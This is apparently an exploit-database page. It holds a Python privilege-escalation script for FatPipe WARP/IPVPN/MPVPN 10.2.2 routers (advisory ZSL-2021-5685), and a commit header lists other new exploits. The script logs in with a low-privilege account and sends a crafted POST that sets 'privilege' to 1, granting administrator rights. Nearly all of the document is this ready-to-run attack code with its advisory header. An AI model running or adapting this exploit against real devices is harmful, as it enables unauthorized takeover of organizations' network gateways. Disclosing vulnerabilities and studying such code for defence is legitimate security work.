4f2cf56b31
11 changes to exploits/shellcodes Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection OpenSIS 8.0 'modname' - Directory Traversal Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting Jetty 9.4.37.v20210219 - Information Disclosure Clinic Management System 1.0 - SQL injection to Remote Code Execution Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
191 lines
No EOL
6.7 KiB
Python
Executable file
191 lines
No EOL
6.7 KiB
Python
Executable file
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
|
|
# Date: 25.07.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.fatpipeinc.com
|
|
|
|
#!/usr/bin/env python3
|
|
#
|
|
#
|
|
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
|
|
#
|
|
#
|
|
# Vendor: FatPipe Networks Inc.
|
|
# Product web page: https://www.fatpipeinc.com
|
|
# Affected version: WARP / IPVPN / MPVPN
|
|
# 10.2.2r38
|
|
# 10.2.2r25
|
|
# 10.2.2r10
|
|
# 10.1.2r60p82
|
|
# 10.1.2r60p71
|
|
# 10.1.2r60p65
|
|
# 10.1.2r60p58s1
|
|
# 10.1.2r60p58
|
|
# 10.1.2r60p55
|
|
# 10.1.2r60p45
|
|
# 10.1.2r60p35
|
|
# 10.1.2r60p32
|
|
# 10.1.2r60p13
|
|
# 10.1.2r60p10
|
|
# 9.1.2r185
|
|
# 9.1.2r180p2
|
|
# 9.1.2r165
|
|
# 9.1.2r164p5
|
|
# 9.1.2r164p4
|
|
# 9.1.2r164
|
|
# 9.1.2r161p26
|
|
# 9.1.2r161p20
|
|
# 9.1.2r161p17
|
|
# 9.1.2r161p16
|
|
# 9.1.2r161p12
|
|
# 9.1.2r161p3
|
|
# 9.1.2r161p2
|
|
# 9.1.2r156
|
|
# 9.1.2r150
|
|
# 9.1.2r144
|
|
# 9.1.2r129
|
|
# 7.1.2r39
|
|
# 6.1.2r70p75-m
|
|
# 6.1.2r70p45-m
|
|
# 6.1.2r70p26
|
|
# 5.2.0r34
|
|
#
|
|
# Summary: FatPipe Networks invented the concept of router-clustering,
|
|
# which provides the highest level of reliability, redundancy, and speed
|
|
# of Internet traffic for Business Continuity and communications. FatPipe
|
|
# WARP achieves fault tolerance for companies by creating an easy method
|
|
# of combining two or more Internet connections of any kind over multiple
|
|
# ISPs. FatPipe utilizes all paths when the lines are up and running,
|
|
# dynamically balancing traffic over the multiple lines, and intelligently
|
|
# failing over inbound and outbound IP traffic when ISP services and/or
|
|
# components fail.
|
|
#
|
|
# FatPipe IPVPN balances load and provides reliability among multiple
|
|
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
|
|
# IPVPN can also provide you an easy low-cost migration path from private
|
|
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
|
|
# MPLS and public networks without additional equipment at the provider's
|
|
# site.
|
|
#
|
|
# FatPipe MPVPN, a patented router clustering device, is an essential part
|
|
# of Disaster Recovery and Business Continuity Planning for Virtual Private
|
|
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
|
|
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
|
|
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
|
|
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
|
|
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
|
|
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
|
|
# you need to keep your VPN up and running despite failures of service, line,
|
|
# software, or hardware.
|
|
#
|
|
# Desc: The application suffers from a privilege escalation vulnerability.
|
|
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
|
|
# POST request and setting the JSON parameter 'privilege' to integer value
|
|
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
|
|
#
|
|
# Tested on: Apache-Coyote/1.1
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2021-5685
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
|
|
#
|
|
#
|
|
# 30.05.2016
|
|
# 25.07.2021
|
|
#
|
|
#
|
|
|
|
import sys
|
|
import time#######
|
|
import requests################
|
|
requests.packages.urllib3.disable_warnings()
|
|
|
|
if len(sys.argv) !=2:
|
|
print
|
|
print("********************************************************")
|
|
print("* *")
|
|
print("* Privilege escalation from USER to ADMINISTRATOR role *")
|
|
print("* in *")
|
|
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
|
|
print("* *")
|
|
print("* ZSL-2021-5685 *")
|
|
print("* *")
|
|
print("********************************************************")
|
|
print("\n[POR] Usage: ./escalator.py [IP]")
|
|
sys.exit()
|
|
|
|
ajpi=sys.argv[1]
|
|
print
|
|
juzer=raw_input("[UNE] Username: ")
|
|
pasvord=raw_input("[UNE] Password: ")
|
|
|
|
sesija=requests.session()
|
|
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
|
|
|
|
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
|
|
'Accept' :'application/json, text/javascript, */*; q=0.01',
|
|
'X-Requested-With':'XMLHttpRequest',
|
|
'Sec-Ch-Ua-Mobile':'?0',
|
|
'User-Agent' :'Fatnet/1.b',
|
|
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
|
|
'Origin' :'https://'+ajpi,
|
|
'Sec-Fetch-Site' :'same-origin',
|
|
'Sec-Fetch-Mode' :'cors',
|
|
'Sec-Fetch-Dest' :'empty',
|
|
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
|
|
'Accept-Encoding' :'gzip, deflate',
|
|
'Accept-Language' :'en-US,en;q=0.9',
|
|
'Connection' :'close'}
|
|
|
|
juarel1='https://'+ajpi+'/fpui/loginServlet'
|
|
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
|
|
|
|
if not 'success' in alo.text:
|
|
print('[GRE] Login error.')
|
|
sys.exit()
|
|
else:
|
|
print('[POR] Authentication successful.')
|
|
|
|
print('[POR] Climbing the ladder...')
|
|
|
|
sluba='''
|
|
|| || .--._
|
|
||====|| __ '---._)
|
|
|| ||"")\ Q Q )
|
|
||====|| =_/ o /
|
|
|| || | \_.-;-'-,._
|
|
||====|| | ' o---o )
|
|
|| || \ /H __H\ /
|
|
||====|| '-' \"")\/ |
|
|
|| || _ |_='-)_/
|
|
||====|| / '. )
|
|
|| || / /
|
|
||====|| |___/\| /
|
|
|| || |_| | |
|
|
||====|| / ) \\ \\
|
|
|| || (__/ \___\\
|
|
||====|| \_\\
|
|
|| || / )
|
|
||====|| (__/
|
|
'''
|
|
|
|
for k in sluba:
|
|
sys.stdout.write(k)
|
|
sys.stdout.flush()
|
|
time.sleep(0.01)
|
|
|
|
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
|
|
posta={
|
|
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
|
|
}
|
|
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
|
|
|
|
if not 'true' in stanje.text:
|
|
print('\n[GRE] Something\'s fishy!')
|
|
sys.exit()
|
|
else:
|
|
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
|
|
sys.exit() |